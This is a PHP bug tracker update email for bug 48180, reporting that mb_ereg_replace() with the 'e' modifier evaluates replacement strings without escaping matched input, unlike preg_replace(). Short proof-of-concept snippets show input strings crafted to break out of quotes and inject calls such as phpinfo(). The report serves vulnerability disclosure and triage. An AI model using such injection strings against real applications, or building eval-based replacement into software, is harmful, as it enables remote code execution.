ID: 48180
Updated by: [email protected]
-Summary: mb_ereg(i)_replace() evaluate replacement string
vulnerability
Reported By: 5up3rh3i at gmail dot com
-Status: Open
+Status: Verified
Bug Type: mbstring related
Operating System: *
-PHP Version: 5.2.9
+PHP Version: 5.*CVS, 6CVS (2009-05-08)
New Comment:
This should show the problem more clearly:
<?php
function test() {echo "THIS SHOULD NOT BE SEEN!!\n";}
function ryat($a) {var_dump($a);}
$str = "', test(), '";
echo "mb_ereg_replace()\n";
var_dump(mb_ereg_replace('^(.*)$', "ryat('\\1')", $str, 'e'));
echo "\npreg_replace()\n";
var_dump(preg_replace('/^(.*)$/e', "ryat('\\1')", $str));
?>
Previous Comments:
------------------------------------------------------------------------
[2009-05-08 00:47:06] 5up3rh3i at gmail dot com
<?php
function ryat() {}
$str = '\', phpinfo(), \'';
preg_replace('/^(.*)$/e', 'ryat(\'\1\')', $str);
?>
plz try this code too
why matches escaped in preg_replace(), but mb_ereg__replace() not?
------------------------------------------------------------------------
[2009-05-07 22:41:03] [email protected]
Yes, it works fine now. What's the bug?
------------------------------------------------------------------------
[2009-05-07 16:21:33] 5up3rh3i at gmail dot com
<?php
function ryat() {}
$str = '\', phpinfo(), \'';
mb_ereg_replace('^(.*)$', 'ryat(\'\1\')', $str, 'e');
?>
plz try this code
------------------------------------------------------------------------
[2009-05-07 16:20:54] 5up3rh3i at gmail dot com
Sorry, the test code is woring
------------------------------------------------------------------------
[2009-05-07 16:15:56] [email protected]
PHP Parse error: syntax error, unexpected T_LNUMBER, expecting
T_STRING
in /home/jani/t.php on line 3
------------------------------------------------------------------------
The remainder of the comments for this report are too long. To view
the rest of the comments, please view the bug report online at
http://bugs.php.net/48180
--
Edit this bug report at http://bugs.php.net/?id=48180&edit=1
